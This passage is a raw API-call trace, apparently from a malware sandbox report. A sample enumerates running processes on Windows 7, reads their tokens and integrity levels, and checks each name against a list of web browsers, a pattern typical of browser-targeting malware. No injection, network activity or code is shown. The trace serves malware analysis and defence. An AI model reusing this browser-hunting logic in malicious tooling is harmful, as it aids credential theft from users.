(in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.973] CloseHandle (hObject=0xb8) returned 1 [0222.973] CloseHandle (hObject=0xb4) returned 1 [0222.973] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0222.973] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167938, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.973] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.973] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.973] GetLastError () returned 0x7a [0222.973] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.973] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.973] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.974] CloseHandle (hObject=0xb8) returned 1 [0222.974] CloseHandle (hObject=0xb4) returned 1 [0222.974] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0222.974] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0222.974] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0222.974] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0222.974] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0222.974] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0222.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0222.974] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.974] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.974] GetLastError () returned 0x7a [0222.974] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.974] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.974] CloseHandle (hObject=0xb8) returned 1 [0222.974] CloseHandle (hObject=0xb4) returned 1 [0222.974] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0222.974] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167a70, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.974] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.974] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.974] GetLastError () returned 0x7a [0222.975] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.975] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.975] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.975] CloseHandle (hObject=0xb8) returned 1 [0222.975] CloseHandle (hObject=0xb4) returned 1 [0222.975] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0222.975] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0222.975] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0222.975] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0222.975] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0222.975] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0222.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0222.975] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.975] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.975] GetLastError () returned 0x7a [0222.975] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.975] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.975] CloseHandle (hObject=0xb8) returned 1 [0222.975] CloseHandle (hObject=0xb4) returned 1 [0222.975] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0222.975] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167b90, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.976] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.976] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.976] GetLastError () returned 0x7a [0222.976] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.976] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.976] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.976] CloseHandle (hObject=0xb8) returned 1 [0222.976] CloseHandle (hObject=0xb4) returned 1 [0222.976] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0222.976] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0222.976] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0222.976] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0222.976] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0222.976] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0222.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0222.976] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.976] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.976] GetLastError () returned 0x7a [0222.976] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.976] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.976] CloseHandle (hObject=0xb8) returned 1 [0222.976] CloseHandle (hObject=0xb4) returned 1 [0222.976] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0222.977] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167cd0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.977] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.977] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.977] GetLastError () returned 0x7a [0222.977] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.977] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.977] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.977] CloseHandle (hObject=0xb8) returned 1 [0222.977] CloseHandle (hObject=0xb4) returned 1 [0222.977] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0222.977] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0222.977] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0222.977] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0222.977] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0222.977] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0222.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0222.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0222.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0222.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0222.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0222.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0222.977] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.977] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.977] GetLastError () returned 0x7a [0222.978] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.978] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.978] CloseHandle (hObject=0xb8) returned 1 [0222.978] CloseHandle (hObject=0xb4) returned 1 [0222.978] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0222.978] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x168268, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.978] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.978] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.978] GetLastError () returned 0x7a [0222.978] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.978] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.978] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.978] CloseHandle (hObject=0xb8) returned 1 [0222.978] CloseHandle (hObject=0xb4) returned 1 [0222.978] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0222.978] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0222.978] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0222.978] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0222.978] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0222.978] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0222.978] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0222.979] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0225.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xc0f0) returned 0xc0000004 [0225.007] VirtualAlloc (lpAddress=0x0, dwSize=0xd0f0, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0225.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xd0f0, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0225.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0225.008] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.008] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.008] GetLastError () returned 0x7a [0225.008] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.008] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.008] CloseHandle (hObject=0xb8) returned 1 [0225.008] CloseHandle (hObject=0xb4) returned 1 [0225.009] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0225.009] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x169510, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.009] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.009] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.009] GetLastError () returned 0x7a [0225.009] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.009] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.009] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.009] CloseHandle (hObject=0xb8) returned 1 [0225.009] CloseHandle (hObject=0xb4) returned 1 [0225.009] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0225.009] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0225.009] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0225.009] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0225.009] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0225.009] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0225.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0225.009] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.009] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.009] GetLastError () returned 0x7a [0225.009] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.009] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.009] CloseHandle (hObject=0xb8) returned 1 [0225.009] CloseHandle (hObject=0xb4) returned 1 [0225.009] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0225.009] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x165d08, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.009] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.009] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.009] GetLastError () returned 0x7a [0225.009] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.009] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, 